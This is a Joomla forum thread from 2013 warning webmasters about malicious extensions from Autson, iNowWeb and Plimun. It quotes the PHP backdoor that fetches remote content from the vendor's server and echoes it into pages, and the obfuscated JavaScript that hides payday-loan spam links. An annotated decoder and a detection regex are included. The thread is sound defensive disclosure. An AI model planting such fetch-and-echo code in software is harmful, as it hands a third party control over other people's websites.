The Joomla! Forum ™

PostPosted: Sat Mar 23, 2013 12:45 am
Joomla! Fledgling

Joined: Fri Mar 22, 2013 10:55 pm
Posts: 2
This is a notice to all developers / webmasters. Check your site to see if you have any extensions installed from Autson.com AKA iNowWeb.com AKA Plimun.com (possibly more).

Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and can do whatever they like to your website. This is a huge security vulnerability. As such, the extensions have been removed from the JED, but they are still on tens of thousands of websites.

The most popular vulnerable extensions are:

- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).

- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.

- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.

- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.

- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).

The hidden backlinks are being inserted via the following code:

Code:
<?php
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>

or

Code:
<?php
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>


etc. The file on their server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the php file.


This is what that code is inserting into the site:

Code:
<script language="JavaScript">
// Decoder: each numeric string is cut into two-digit numbers and every
// number is shifted back into an ASCII code (the shift is 25-l+a, i.e.
// 25 minus the array index). The four strings decode to "style", a CSS
// rule of the form "position:absolute;top:-9...9px", the class name "dnn"
// and "type='text/css'".
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}
// Writes <style ...>.dnn{position:absolute;top:-9...9px}</style> into the
// page, so the paragraph below is pushed far off-screen: invisible to a
// visitor, but still in the HTML for search engines. (x[4] is out of
// range for the four-element array, so the browser sees "<style undefined>".)
document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>

<p class="dnn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>

or

Code:
<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>

<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>

Additional extensions from these developers that are possibly vulnerable as well:

iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show

Plimun.com:
- Plimun Twitter Ticker
- Twitter Show

I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displaying hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr

So what can we do to stop these spammers/hackers?

1. Remove the extensions from your or your clients' websites (or just remove the malicious code).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to [email protected]. They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are:
Code:
autson.com , inowweb.com , plimun.com


The actions of developers like this adversely affect the entire Joomla community and we must do something to stop it.


Last edited by mandville on Sat Mar 23, 2013 6:41 pm, edited 1 time in total.
retitled to be more descriptive. malicious backlink code is not a vulnerability or exploit. Links found in generated code without proof of site control or infection.
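To make the two snippets in the first post concrete, here is an added Python example (not code from the thread or from the extensions): it replays the injected script's decoder to show that the stylesheet it writes pushes the "dnn" paragraph far off-screen, and it scans PHP module source for the remote fetch-and-echo pattern the post describes. The PHP strings are constructed samples; the numeric array is copied from the post.

```python
import re

# Constructed sample: the obfuscated string array from the dnnViewState()
# script quoted in the first post, copied verbatim.
DNN_CHUNKS = [
    "9091968376",
    "8887918192818786347374918784939277359287883421333333338896",
    "778787",
    "949990793917947998942577939317",
]

def decode_view_state(chunks):
    """Replay the injected script's decoder: walk the array backwards, cut
    each string into two-digit numbers and add 25 - index to each one."""
    n = len(chunks)
    out = list(chunks)
    for a in range(1, n + 1):
        m, shift = chunks[n - a], 25 - n + a
        pairs = (m[v:v + 2] for v in range(0, len(m) - len(m) % 2, 2))
        out[n - a] = "".join(chr(int(p) + shift) for p in pairs)
    return out

def hidden_stylesheet(chunks):
    """Rebuild the markup the script hands to document.write(); x[4] is out
    of range for the four-element array, so a browser sees 'undefined'."""
    x = decode_view_state(chunks)
    attr = x[4] if len(x) > 4 else "undefined"
    return f"<{x[0]} {attr}>.{x[2]}{{{x[1]}}}</{x[0]}>"

# Detection side: the dropper in the module PHP files stores the result of a
# remote file_get_contents() in a variable and echoes it into the page.
REMOTE_FETCH = re.compile(
    r"""\$(\w+)\s*=\s*file_get_contents\(\s*['"]https?://""", re.IGNORECASE)

def find_remote_echo(php_source):
    """Return [(variable, line_no), ...] for each variable filled from a
    remote URL and echoed later in the same file; [] when the file is clean."""
    hits = []
    lines = php_source.splitlines()
    for no, line in enumerate(lines, start=1):
        m = REMOTE_FETCH.search(line)
        if m and re.search(r"\becho\s+\$" + m.group(1) + r"\b",
                           "\n".join(lines[no:])):
            hits.append((m.group(1), no))
    return hits

# Constructed samples: a module file carrying the snippet from the post and
# a clean one that only reads a local template file.
INFECTED = ("<?php\ndefined('_JEXEC') or die;\n"
            "$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);\n"
            "echo $credit;\n")
CLEAN = ("<?php\n$tpl=file_get_contents(JPATH_BASE.'/tmpl/default.html');\n"
         "echo $tpl;\n")
```

Run find_remote_echo over every .php file under the modules directory of a site to get a first list of files to inspect; as a later reply in this thread notes, removing only the flagged lines may leave other controlling code behind, so the extension itself should still be removed.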


PostPosted: Sat Mar 23, 2013 5:10 am
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12556
Location: The Girly Side of Joomla in Sussex
It is actions like this that get a dev banned from the JED. This dev was banned long ago.

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


PostPosted: Sat Mar 23, 2013 7:14 am
Joomla! Fledgling

Joined: Fri Mar 22, 2013 10:55 pm
Posts: 2
Yes, the developer was banned, but it went unnoticed for so long that now there are over 20,000 infected websites out there. I made this thread to hopefully bring more attention to the vulnerable extensions mentioned above so that the affected webmasters can be alerted to the problem and act accordingly. I know it's unrealistic to reach every webmaster, but every little bit helps.


PostPosted: Wed Mar 27, 2013 3:12 pm
Joomla! Apprentice

Joined: Mon Apr 27, 2009 6:21 pm
Posts: 17
Location: New Delhi, India
Thank you for this warning. Two of my most important websites were infected via the extension AddThis. I have gone ahead and removed this extension as well as the Facebook slider.

Much obliged to you for saving my websites.

_________________
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the grass grows by itself."


PostPosted: Wed Mar 27, 2013 3:21 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25899
Location: @Webdongle
alphaprodigy wrote:
Yes, the developer was banned, but it went unnoticed for so long ...

There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


PostPosted: Wed Mar 27, 2013 4:21 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12556
Location: The Girly Side of Joomla in Sussex
Also to note that occasionally a developer will upload a clean extension to the jed for checking and then once the hits start rolling in, upload a dodgy package to their website.

PostPosted: Wed Mar 27, 2013 4:44 pm
Joomla! Master

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10542
Location: Leeds, UK
Webdongle wrote:
alphaprodigy wrote:
Yes, the developer was banned, but it went unnoticed for so long ...

There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?


The JED can only react to reports. I personally spotted this issue and reported it to the JED, who took action immediately.

_________________
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/


PostPosted: Wed Mar 27, 2013 5:05 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25899
Location: @Webdongle
brian wrote:
...
The JED can only react to reports. ...
I recall a post where it was stated that extensions were checked for malicious code in an extension before it was accepted ?

PostPosted: Wed Mar 27, 2013 5:08 pm
Joomla! Master

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10542
Location: Leeds, UK
Sadly it's not possible to ensure that the version uploaded is the same as the version that is available for download. Nor is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release.

PostPosted: Wed Mar 27, 2013 5:53 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25899
Location: @Webdongle
brian wrote:
... Not is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release
That's a good point ... pity there are not more people checking.

PostPosted: Thu Mar 28, 2013 2:38 am
Joomla! Apprentice

Joined: Mon Apr 27, 2009 6:21 pm
Posts: 17
Location: New Delhi, India
I have become economical in the use of Joomla extensions, especially since I upgraded to Joomla 2.5. The migration was a headache as many extensions either had been discontinued or the upgrade was not available.

Plus my most valuable site was hacked due to doorways in certain extensions. Even paid extensions.

Joomla is a robust platform. With almost a minimal use of extensions, I have brought my expectations down and do not opt for the fancy stuff immediately.

Still, even then I had been beguiled into believing that some extensions are okay, which it seems they are not.

Nowadays I am very strict in incorporating extensions in my website. Some extensions I cannot do without, and have to use them.

I believe, eventually in a few years time, Joomla would have most of the basic requirements of a website built in native.

PostPosted: Mon Apr 08, 2013 11:19 am
Joomla! Apprentice

Joined: Mon Mar 28, 2011 2:43 pm
Posts: 12
Wow, I'm quite surprised that someone would do so much effort to contact and inform website owners about these malicious extensions.

I received a random email from a certain Tom E informing me of Add-This, etc.

Although I am grateful that he notified me, I am surprised that someone would go to such great lengths to let me know. My website (ezywebsites.co.za) is one of the 20 000 mentioned in the first post.

Yet, as soon as I get a chance, I'll check all my clients.

_________________
Francois du Toit
Webpreneur
Latest Niche Site: http://www.health2u.co.za/during-pregnancy
http://www.ezywebsites.co.za


PostPosted: Tue Apr 09, 2013 4:00 pm
Joomla! Apprentice

Joined: Sat Mar 17, 2012 6:53 pm
Posts: 22
You have my greatest thanks, alphaprodigy. I've immediately removed the malicious code from the Autson Slideshow.


PostPosted: Tue Apr 09, 2013 11:11 pm
Joomla! Fledgling

Joined: Tue Apr 09, 2013 11:06 pm
Posts: 1
Additional behaviour noticed with [spam] for Joomla!:

The extension was used/evaluated for use for website(s) by me/us, and some peculiar behaviour was noticed.

1> The above mentioned extension used to load insecure code. (We accidentally discovered it when we enabled site-wide SSL/HTTPS a few months ago.) When LinkedIn (and maybe other social options) was selected, a nasty browser warning (for loading insecure content) used to be thrown up. The issue was not investigated further (it was easier to find an alternative extension).

2> Another aspect worth mentioning: the above mentioned backlinks are not loaded in some configurations (but are definitely loaded when LinkedIn is selected), which suggests there may be more lines of code controlling the backlink's behaviour.

Hence I suggest you rephrase/remove "(or just remove the malicious code)", as this may give a false sense of security that the issue has been fixed by removing a few lines of code (and something else may get missed).


PostPosted: Sun Apr 14, 2013 9:07 am
Joomla! Fledgling

Joined: Wed Aug 22, 2012 2:11 pm
Posts: 3
I also received an email from someone at a gmail account warning me that my site was infected and pointing me to this thread. The code was there so I disabled and uninstalled the addthis extension that was causing the problem and the code is now gone. THANK YOU SO MUCH for letting me know, much appreciated!

Now does anyone know of a reliable free alternative to the addthis social sharing extension? This has put me off a little and I'm not sure what to choose anymore...

Luigi


PostPosted: Tue Apr 16, 2013 10:07 am
Joomla! Apprentice

Joined: Mon Apr 08, 2013 9:06 pm
Posts: 5
Thanks for the email, I seem to have removed the script and deleted the plugin. It seems to only have been on my home page as I can't see it on any of the other page sources (I hope). Does anyone know a safe plugin for the twitter/facebook/google icons on my website so I can tweet/like post new products I list?


PostPosted: Tue Apr 16, 2013 10:02 pm
Joomla! Apprentice

Joined: Mon Apr 08, 2013 9:06 pm
Posts: 5
I'm surprised there have not been more comments on this. I have had the rogue plugin on my site for over 10 months; with over 20,000 sites affected I thought this topic would be bigger than it is?


PostPosted: Tue Apr 16, 2013 11:35 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12556
Location: The Girly Side of Joomla in Sussex
mark4740 wrote:
I'm surprised there have not been more comments on this. I have had the rogue plugin on my site for over 10 months; with over 20,000 sites affected I thought this topic would be bigger than it is?

You are relying on the belief that people feel compelled to come here and say "me2", "+1", "I owe you my first born".
The OP did their apparent civic duty informing people of the issue; this is not the proverbial field of dreams.
People downloaded and installed the extensions, got caught, got notified and hopefully removed it. End of most people's stories regarding this developer.

PostPosted: Sat Apr 20, 2013 3:36 am
Joomla! Fledgling

Joined: Sat Apr 20, 2013 3:29 am
Posts: 1
I would like to say thanks to whomever tipped me off. I sent them an email, but maybe they will see it here.

Anyway, thank you.

jw


PostPosted: Sat Apr 27, 2013 4:06 pm
Joomla! Fledgling

Joined: Sat Apr 27, 2013 4:01 pm
Posts: 1
Thanks for the email, the script was removed when I deleted the plugin!


PostPosted: Mon Feb 03, 2014 5:04 pm
Joomla! Apprentice

Joined: Thu Feb 12, 2009 4:32 pm
Posts: 9
I got burned by this extension, and found out the hard way, had to search through my site for the vulnerability. I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow. Joomla has almost no control over extensions, unlike other CMSs. I hope to get all my Joomla sites converted to Drupal soon.


PostPosted: Mon Feb 03, 2014 6:22 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12556
Location: The Girly Side of Joomla in Sussex
paulfoos wrote:
had to search through my site for the vulnerability.
With all due respect, please do not confuse "malicious" with "vulnerable".
Quote:
I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow.
The extensions are listed there: http://vel.joomla.org/articles/844-spot ... sions.html Published on Tuesday, 27 August 2013

Quite often extensions downloaded from the dev's website have "extra" code not in the zip provided to the JED for checking.
